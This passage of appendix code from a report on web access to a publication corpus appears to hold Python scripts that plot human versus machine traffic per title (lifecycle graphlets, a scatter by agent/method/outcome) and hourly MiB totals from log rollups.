    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# Machine = every non-human actor family retained in the rollups.
# This intentionally includes unattributed metadata plus attributed AI/bot/curlwget/etc.

MACHINE_PREFIXES = ("ai_", "bot_", "curlwget_", "metadata_", "badbot_")

machine_cols = [
    c for c in header
    if c.lower().startswith(MACHINE_PREFIXES)
]

machine_idx = [col_index[c] for c in machine_cols]

H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # Green: all non-human actor buckets on both page and meta carriers.
            s = 0
            for idx in machine_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS


def pub_bucket_start(t: str) -> datetime:
    # Snap the publication instant down to the start of its bucket.
    epoch = (int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS
    return datetime.fromtimestamp(epoch, tz=timezone.utc)


max_rel = max(
    int((max_bucket - pub_bucket_start(t)).total_seconds() // BUCKET_SECONDS)
    for t in eligible_titles
)
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, n:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs All Machines Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKETS={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP})"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ non-human rollup buckets; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)
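The zero-padded centered moving average is the one numerically delicate step in the lifecycle script, so it is worth checking in isolation. The sketch below reproduces `ma_center_zero` as a standalone function and runs it on a toy series (the input values are illustrative only):

```python
import numpy as np


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    # Centered moving average; samples beyond the series edges count as zero,
    # matching the behaviour of the lifecycle script above.
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1  # force an odd window so the average stays centered
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


series = np.array([0.0, 3.0, 6.0, 3.0, 0.0])
print(ma_center_zero(series, 3))  # -> [1. 3. 4. 3. 1.]
```

The edge values are pulled toward zero because the padding treats everything outside the logged window as zero access, which is the intended semantics for lifecycle graphlets.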

Appendix G - Scatter Plot

The following code deterministically generates a scatter plot of publications access.

#!/usr/bin/env python3
"""Scatter (corpus titles only) — invariant projection (Appendix A/C)

Run:
  python3 scatter_titles_corpus_HUMAN_200_304_desc.py --rollups rollups.tgz --corpus corpus-11.tgz --out out.png
"""

import argparse, re, tarfile, math
from datetime import datetime, timezone
from urllib.parse import unquote, parse_qs

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.ticker import LogLocator, LogFormatterMathtext

AGENTS = ['human', 'metadata', 'ai', 'bot', 'curlwget', 'badbot']
AGENT_COLOR = {'human': '#0096FF', 'metadata': '#FFA500', 'ai': '#008000', 'bot': '#FF69B4', 'curlwget': '#800080', 'badbot': '#FF0000'}
METHODS = ['GET', 'POST', 'PUT', 'HEAD', 'OTHER']
METHOD_MARKER = {'GET': 'o', 'POST': '^', 'PUT': 'v', 'HEAD': 'D', 'OTHER': '.'}
OUTCOMES = ['ok', 'redirect', 'error', 'other']
OUTCOME_OVERLAY = {'ok': None, 'redirect': (2, 0, 45), 'error': 'x', 'other': '+'}
THETA = [60, 120, 250, 300]

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------

RENAME_MAP = {

    # -------------------------------------------------------------
    # First Self-Hosting Epistemic Capture
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",

    # -------------------------------------------------------------
    # CM-2 Governing Knowledge
    # -------------------------------------------------------------
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration",

    # -------------------------------------------------------------
    # Corpus Map
    # -------------------------------------------------------------
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",

    # -------------------------------------------------------------
    # Plain Language Summary typo
    "Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",


    # -------------------------------------------------------------
    # Missing '?' fix
    # -------------------------------------------------------------
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",

}

fn_re = re.compile(
    r".*/(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z"
    r"-to-(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$"
)

def bucket_start_from_name(name: str) -> datetime:
    m = fn_re.match(name)
    y, mo, d, hh, mm = map(int, m.group(1,2,3,4,5))
    return datetime(y, mo, d, hh, mm, tzinfo=timezone.utc)

def norm_title(t: str) -> str:
    canon = RENAME_MAP.get(t)
    if canon:
        return canon

    t = unquote(str(t)).replace("_", " ")
    t = re.sub(r"[–—]", "-", t)
    return re.sub(r"\s+", " ", t).strip()

def load_title_set(corpus_tgz: str) -> set:
    import io  # stdlib StringIO; pd.io.common.StringIO is a private pandas alias
    with tarfile.open(corpus_tgz, "r:*") as tf:
        mpath = next(n for n in tf.getnames() if n.endswith("manifest.tsv"))
        txt = tf.extractfile(mpath).read().decode("utf-8", errors="replace")
    man = pd.read_csv(io.StringIO(txt), sep="\t", dtype=str)
    return set(norm_title(t) for t in man.iloc[:,0].fillna("").astype(str).tolist() if norm_title(t))

def extract_title_from_path(raw_path: str):
    if not isinstance(raw_path, str):
        return None
    p = unquote(raw_path)
    if p.startswith("/pub-meta/"):
        parts = p.split("/")
        if len(parts) >= 4:
            return norm_title(parts[-1])
        return None
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):])
    if p.startswith("/pub-dir/index.php") and "?" in p:
        qs = p.split("?", 1)[1]
        params = parse_qs(qs, keep_blank_values=True)
        if "title" in params and params["title"]:
            return norm_title(params["title"][0])
        if "page" in params and params["page"]:
            return norm_title(params["page"][0])
    return None

def compass_unit(theta_deg: float):
    r = math.radians(theta_deg)
    return np.array([math.sin(r), math.cos(r)], dtype=float)

def bin_key(agent, method, outcome):
    return (AGENTS.index(agent), METHODS.index(method), OUTCOMES.index(outcome))

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups", required=True)
    ap.add_argument("--corpus", required=True)
    ap.add_argument("--out", required=True)
    args = ap.parse_args()

    title_set = load_title_set(args.corpus)

    with tarfile.open(args.rollups, "r:gz") as tf:
        tsv_names = [n for n in tf.getnames() if fn_re.match(n)]
        tsv_names.sort(key=bucket_start_from_name)
        first = tf.extractfile(tsv_names[0])
        header = first.readline().decode("utf-8", errors="replace").rstrip("\n").split("\t")
        idx = {c:i for i,c in enumerate(header)}
        path_col = next(c for c in header if c.lower()=="path")

        col_pat = re.compile(r"^(human|metadata|ai|bot|curlwget)_(get|post|put|head|other)_(ok|redirect|error|other)$", re.I)
        cols=[]
        for c in header:
            m=col_pat.match(c)
            if m:
                cols.append((c, m.group(1).lower(), m.group(2).upper(), m.group(3).lower()))
        badbot_col = next((c for c in header if c.lower()=="badbot_308"), None)

        agg={}
        def add(k,v):
            if v>0:
                agg[k]=agg.get(k,0)+v

        for name in tsv_names:
            f=tf.extractfile(name)
            _=f.readline()
            for raw in f:
                line=raw.decode("utf-8", errors="replace").rstrip("\n")
                if not line:
                    continue
                parts=line.split("\t")
                if len(parts)!=len(header):
                    continue
                raw_path=parts[idx[path_col]]
                title=extract_title_from_path(raw_path)
                if title is None or title not in title_set:
                    continue
                for c, agent, method, outcome in cols:
                    try:
                        v = int(parts[idx[c]])
                    except Exception:
                        v = 0
                    add((title, agent, method, outcome), v)
                if badbot_col is not None:
                    try:
                        bb = int(parts[idx[badbot_col]])
                    except Exception:
                        bb = 0
                    add((title, "badbot", "GET", "redirect"), bb)

    df=pd.DataFrame([{"title":t,"agent":a,"method":m,"outcome":o,"hits":h}
                     for (t,a,m,o),h in agg.items() if h>0])
    if df.empty:
        raise RuntimeError("No hits after filtering to corpus titles.")

    human_ok = df[(df.agent=="human") & (df.method=="GET") & (df.outcome=="ok")].groupby("title")["hits"].sum()
    human_redir = df[(df.agent=="human") & (df.method=="GET") & (df.outcome=="redirect")].groupby("title")["hits"].sum()
    human_200_304 = (human_ok.add(human_redir, fill_value=0)).astype(float)

    present_titles=set(df["title"].unique())
    titles_sorted = sorted(present_titles, key=lambda t: (-human_200_304.get(t,0.0), t))
    N=len(titles_sorted)
    y_index = {t: float((N-1)-i) for i,t in enumerate(titles_sorted)}
    df["y"]=df["title"].map(y_index).astype(float)
    df["bin_rank"]=df.apply(lambda r: bin_key(r["agent"], r["method"], r["outcome"]), axis=1)

    fig_h = max(7, 0.28*N + 2.8)
    fig, ax = plt.subplots(figsize=(18, fig_h))
    ax.set_xscale("log")
    xmin = max(1, float(df["hits"].min()))
    xmax = float(df["hits"].max())
    ax.set_xlim(xmin*0.9, xmax*1.1)
    ax.set_ylim(-1, N)

    ax.set_yticks([y_index[t] for t in titles_sorted])
    ax.set_yticklabels([t for t in titles_sorted], fontsize=10)

    ax.xaxis.set_major_locator(LogLocator(base=10.0))
    ax.xaxis.set_major_formatter(LogFormatterMathtext())
    ax.xaxis.set_minor_locator(LogLocator(base=10.0, subs=np.arange(2,10)*0.1))
    ax.grid(True, which="major", axis="x", linewidth=0.9)
    ax.grid(True, which="minor", axis="x", linewidth=0.35)

    for t in titles_sorted:
        y=y_index[t]
        ax.hlines(y, ax.get_xlim()[0], ax.get_xlim()[1], linewidth=0.3, alpha=0.4)

    ax.set_xlabel("Hits (log scale)")
    ax.set_title("Scatter (corpus titles only): colour=agent, shape=method, overlay=strike — Y ordered by HUMAN_200_304")

    base_s=43.0
    r_points = math.sqrt(base_s)/2.0
    dpi=fig.dpi
    r_px = r_points*dpi/72.0
    d_px = 0.75*r_px
    overlap_allow_px = 0.75*r_px
    min_sep_px = 2.10 * r_px - overlap_allow_px

    p0 = ax.transData.transform((1.0, 0.0))
    p1 = ax.transData.transform((1.0, 0.45))
    row_band_px = abs(p1[1]-p0[1])
    inv = ax.transData.inverted()

    placed_px_by_row = {t: [] for t in titles_sorted}

    def ok_place(px, placed_list):
        for q in placed_list:
            if np.linalg.norm(px-q) < min_sep_px:
                return False
        return True

    for t in titles_sorted:
        row = df[df["title"]==t].copy()
        y_base = y_index[t]

        anchor = row[(row.agent=="human") & (row.method=="GET") & (row.outcome=="ok")]
        if not anchor.empty:
            x=float(anchor["hits"].iloc[0])
            P0_px=ax.transData.transform((x, y_base))
            placed_px_by_row[t].append(P0_px)
            ax.scatter([x],[y_base], s=base_s, marker=METHOD_MARKER["GET"], c=AGENT_COLOR["human"], linewidths=0, zorder=3)

        rem = row[~((row.agent=="human") & (row.method=="GET") & (row.outcome=="ok"))].sort_values("bin_rank")
        for _, r in rem.iterrows():
            agent=r["agent"]; method=r["method"]; outcome=r["outcome"]; x=float(r["hits"])
            P0_px=ax.transData.transform((x, y_base))
            placed_list=placed_px_by_row[t]
            chosen_px=None

            if ok_place(P0_px, placed_list):
                chosen_px=P0_px
            else:
                k_max=1
                attempts=0
                while chosen_px is None and attempts < 200:
                    attempts += 1
                    for theta in THETA:
                        for k in range(1, k_max+1):
                            cand = P0_px + (k*d_px)*compass_unit(theta)
                            if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                                chosen_px=cand
                                break
                        if chosen_px is not None:
                            break
                    if chosen_px is None:
                        k_max += 1
                        if k_max > 6:
                            for q in placed_list:
                                for theta in THETA:
                                    cand = q + d_px*compass_unit(theta)
                                    if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                                        chosen_px=cand
                                        break
                                if chosen_px is not None:
                                    break
                        if k_max > 12:
                            chosen_px=P0_px
                            break

            if chosen_px is not None and abs(chosen_px[1]-P0_px[1]) < 0.5 and not ok_place(P0_px, placed_list):
                cand = P0_px + d_px*compass_unit(THETA[0])
                if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                    chosen_px=cand

            placed_list.append(chosen_px)
            x_d, y_d = inv.transform(chosen_px)

            ax.scatter([x_d],[y_d], s=base_s if method!="OTHER" else 44.0,
                       marker=METHOD_MARKER.get(method,"."), c=AGENT_COLOR[agent], linewidths=0, zorder=3)

            ov=OUTCOME_OVERLAY.get(outcome)
            if ov is not None:
                ax.scatter([x_d],[y_d], s=92.0, marker=ov, c="black", linewidths=2.0, zorder=4)

    handles=[]
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Agent (colour)"))
    for a in AGENTS:
        handles.append(Line2D([0],[0], marker="o", linestyle="None",
                              markerfacecolor=AGENT_COLOR[a], markeredgecolor=AGENT_COLOR[a], label=a))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Method (shape)"))
    for m in METHODS:
        handles.append(Line2D([0],[0], marker=METHOD_MARKER[m], linestyle="None",
                              color="black", markerfacecolor="black", label=m))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Outcome overlay (black)"))
    handles.append(Line2D([0],[0], marker="x", linestyle="None", color="black", label="x = error"))
    handles.append(Line2D([0],[0], marker=(2,0,45), linestyle="None", color="black", label="/ = redir"))
    handles.append(Line2D([0],[0], marker="+", linestyle="None", color="black", label="+ = other"))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, color="black", label="none = ok"))

    leg=ax.legend(handles=handles, title="Legend", loc="lower right", framealpha=0.85)
    leg.get_frame().set_linewidth(0.8)

    # plt.subplots_adjust(left=0.28, right=0.98, top=0.92, bottom=0.10)
    # --- BEGIN delta: auto-fit left margin to longest y tick label ---
    fig.canvas.draw()  # needed to get a renderer

    renderer = fig.canvas.get_renderer()
    ticklabels = ax.get_yticklabels()

    max_px = 0
    for lab in ticklabels:
        bb = lab.get_window_extent(renderer=renderer)
        max_px = max(max_px, bb.width)


    # convert pixels -> figure fraction and add padding
    pad_px = 18
    left = (max_px + pad_px) / (fig.get_size_inches()[0] * fig.dpi)

    # clamp so we don't blow the plot away
    left = min(max(left, 0.12), 0.55)

    plt.subplots_adjust(left=left, right=0.98, top=0.92, bottom=0.10)
    # --- END delta ---
    plt.savefig(args.out, dpi=220)
    plt.close(fig)

if __name__ == "__main__":
    main()
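For quick verification of the carrier handling, the title extraction can be exercised on its own. The sketch below reproduces the path classification from the scatter script with the rename map omitted and purely illustrative paths (no real corpus titles are assumed):

```python
import re
from urllib.parse import unquote, parse_qs


def norm_title(t: str) -> str:
    # Simplified normalisation (rename map omitted): decode, de-underscore, dash-fold.
    t = unquote(str(t)).replace("_", " ")
    t = re.sub(r"[–—]", "-", t)
    return re.sub(r"\s+", " ", t).strip()


def extract_title_from_path(p: str):
    # Three carrier shapes: /pub-meta/, /pub/, and the /pub-dir/index.php query form.
    p = unquote(p)
    if p.startswith("/pub-meta/"):
        parts = p.split("/")
        return norm_title(parts[-1]) if len(parts) >= 4 else None
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):])
    if p.startswith("/pub-dir/index.php") and "?" in p:
        params = parse_qs(p.split("?", 1)[1], keep_blank_values=True)
        for key in ("title", "page"):
            if params.get(key):
                return norm_title(params[key][0])
    return None


# Illustrative paths only; real titles come from the corpus manifest.
print(extract_title_from_path("/pub/Some_Example_Title"))  # -> Some Example Title
print(extract_title_from_path("/pub-dir/index.php?title=Some_Example_Title"))
```

Paths that match none of the three carriers return `None` and are dropped, which is how the scatter script filters traffic down to corpus titles.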

Appendix H - MiB Projection

The following code takes the rollups and collects the MiB totals from the hourly buckets.

#!/usr/bin/env python3
"""
Generate MiB/hour time series and graph from rollups only.

Assumptions (matches your rollup format):
- Each rollup file is a 1-hour bucket TSV.
- Filename contains bucket window like:
    YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
- Each TSV row has a 'total_bytes' column (bytes for that path in that bucket).
- To get total bucket traffic, we SUM total_bytes across all rows in the file.

Outputs:
- time_series_mib_hourly_from_rollups.tsv
- mib_hourly_log_ma3_1000px.png
"""

import argparse
import csv
import os
import re
from datetime import datetime, timezone
from typing import Optional, Tuple, List, Dict

import pandas as pd
import matplotlib.pyplot as plt


FILENAME_RE = re.compile(
    r"^(?P<y1>\d{4})_(?P<m1>\d{2})_(?P<d1>\d{2})T(?P<h1>\d{2})_(?P<min1>\d{2})Z"
    r"-to-"
    r"(?P<y2>\d{4})_(?P<m2>\d{2})_(?P<d2>\d{2})T(?P<h2>\d{2})_(?P<min2>\d{2})Z"
    r"\.tsv$"
)


def parse_bucket_from_filename(fn: str) -> Tuple[datetime, datetime]:
    m = FILENAME_RE.match(fn)
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    g = m.groupdict()
    start = datetime(int(g["y1"]), int(g["m1"]), int(g["d1"]), int(g["h1"]), int(g["min1"]), tzinfo=timezone.utc)
    end   = datetime(int(g["y2"]), int(g["m2"]), int(g["d2"]), int(g["h2"]), int(g["min2"]), tzinfo=timezone.utc)
    return start, end


def read_bucket_total_bytes(path: str, server_filter: Optional[str] = None) -> Tuple[int, Optional[str]]:
    """
    Returns (sum_total_bytes, inferred_server_name_or_None).

    If server_filter is set and 'server_name' column exists, only rows matching are counted.
    """
    total = 0
    inferred_server = None

    with open(path, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        header = next(reader)

        col = {name: i for i, name in enumerate(header)}
        if "total_bytes" not in col:
            raise RuntimeError(f"Missing 'total_bytes' column in {path}")

        idx_total_bytes = col["total_bytes"]
        idx_server = col.get("server_name", None)

        for row in reader:
            if not row:
                continue

            if idx_server is not None and len(row) > idx_server:
                sname = row[idx_server]
                if inferred_server is None and sname:
                    inferred_server = sname

                if server_filter is not None and sname != server_filter:
                    continue
            elif server_filter is not None:
                # asked to filter but file has no server_name col
                continue

            try:
                total += int(row[idx_total_bytes])
            except Exception:
                # treat malformed as zero
                pass

    return total, inferred_server


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups_dir", default="rollups", help="Directory containing hourly rollup TSVs")
    ap.add_argument("--server", default=None, help="Optional server_name filter (exact match)")
    ap.add_argument("--out_tsv", default="time_series_mib_hourly_from_rollups.tsv", help="Output TSV")
    ap.add_argument("--out_png", default="mib_hourly_log_ma3_1000px.png", help="Output PNG graph")
    ap.add_argument("--dpi", type=int, default=100, help="DPI (default: 100)")
    ap.add_argument("--width_px", type=int, default=1000, help="Output width in pixels (default: 1000)")
    ap.add_argument("--height_px", type=int, default=500, help="Output height in pixels (default: 500)")
    args = ap.parse_args()

    files = sorted([f for f in os.listdir(args.rollups_dir) if f.endswith(".tsv")])

    rows: List[Dict] = []
    inferred_server_global = None

    for fn in files:
        try:
            start, end = parse_bucket_from_filename(fn)
        except ValueError:
            # skip non-rollup TSVs that don't match the bucket naming convention
            continue

        fp = os.path.join(args.rollups_dir, fn)
        total_bytes, inferred_server = read_bucket_total_bytes(fp, server_filter=args.server)

        if inferred_server_global is None and inferred_server:
            inferred_server_global = inferred_server

        bucket_seconds = int((end - start).total_seconds())
        mib = total_bytes / (1024.0 * 1024.0)
        mib_per_second = mib / bucket_seconds if bucket_seconds > 0 else 0.0

        rows.append(
            {
                "server_name": args.server if args.server else (inferred_server or inferred_server_global or ""),
                "bucket_start": start.isoformat().replace("+00:00", "Z"),
                "bucket_end": end.isoformat().replace("+00:00", "Z"),
                "bucket_seconds": bucket_seconds,
                "total_bytes": total_bytes,
                "MiB": mib,
                "MiB_per_second": mib_per_second,
            }
        )

    if not rows:
        raise SystemExit("No rollup TSVs matched the expected filename pattern in rollups_dir.")

    df = pd.DataFrame(rows)
    df["bucket_start"] = pd.to_datetime(df["bucket_start"], utc=True)
    df = df.sort_values("bucket_start").reset_index(drop=True)

    # MA(3) across hourly buckets; first 2 points undefined
    df["MA3_MiB"] = df["MiB"].astype(float).rolling(window=3, min_periods=3).mean()

    # Write derived series TSV (audit)
    out_df = df.copy()
    out_df["bucket_start"] = out_df["bucket_start"].dt.strftime("%Y-%m-%dT%H:%M:%SZ")
    out_df.to_csv(args.out_tsv, sep="\t", index=False)

    # Plot at requested pixel size
    fig_w_in = args.width_px / args.dpi
    fig_h_in = args.height_px / args.dpi
    plt.figure(figsize=(fig_w_in, fig_h_in), dpi=args.dpi)

    plt.plot(df["bucket_start"], df["MiB"], label="MiB/hour")
    plt.plot(df["bucket_start"], df["MA3_MiB"], label="MA(3) MiB/hour")

    # Log paper + graticules
    plt.yscale("log")
    plt.grid(True, which="major")
    plt.grid(True, which="minor")

    # X ticks every 7 days, oblique
    start = df["bucket_start"].min().normalize()
    end = df["bucket_start"].max().normalize()
    tick_locs = pd.date_range(start=start, end=end, freq="7D", tz="UTC")
    plt.xticks(tick_locs, rotation=45, ha="right")

    plt.xlabel("Date (UTC)")
    plt.ylabel("MiB per Hourly Bucket (log scale)")
    title = "Hourly Traffic (MiB/hour) with MA(3) Overlay"
    if args.server:
        title += f" — server={args.server}"
    plt.title(title)
    plt.legend()
    plt.tight_layout()

    plt.savefig(args.out_png)
    print(f"Wrote: {args.out_tsv}")
    print(f"Wrote: {args.out_png}")


if __name__ == "__main__":
    main()
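The per-bucket conversion in the script above is simple division; the sketch below isolates it so the arithmetic can be checked (the byte count and bucket window are illustrative):

```python
from datetime import datetime, timezone


def bucket_mib(total_bytes: int, start: datetime, end: datetime):
    # Mirrors the conversion in the MiB projection script:
    # MiB per bucket, MiB per second, and the bucket length in seconds.
    secs = int((end - start).total_seconds())
    mib = total_bytes / (1024.0 * 1024.0)
    return mib, (mib / secs if secs > 0 else 0.0), secs


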